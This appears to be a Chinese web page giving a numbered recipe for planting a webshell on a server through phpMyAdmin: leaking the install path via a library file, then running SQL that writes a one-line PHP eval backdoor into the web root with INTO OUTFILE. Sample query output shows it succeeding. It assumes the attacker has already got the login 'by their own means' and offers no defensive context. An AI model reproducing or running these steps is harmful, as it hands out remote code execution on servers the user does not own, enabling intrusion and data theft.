我要评论1.如何拿到登陆密码,自己想办法。
2.访问 : http://url/phpmyadmin/libraries/select_lang.lib.php 得到物理路径.
3.选择一个database.运行以下语句.
----start code---
create table a (cmd text not null);
insert into a (cmd) values('<?php eval($_post[1]);?>');
select cmd from a into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php/d.php';
drop table if exists a;
----end code---
4.如果没什么意外.对应网站得到webshell
您运行的 sql 语句已经成功运行了。
sql 查询:
create table a(
cmd text not null
);# mysql 返回的查询结果为空(即零行)。
insert into a( cmd )
values (
'<?php eval($_post[1]);?>'
);# 影响列数: 1
select cmd
from a
into outfile 'f:/program files/apache group/apache2/htdocs/phpmyadmin/d.php';# 影响列数: 1
drop table if exists a;# mysql 返回的查询结果为空(即零行)。
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
网友评论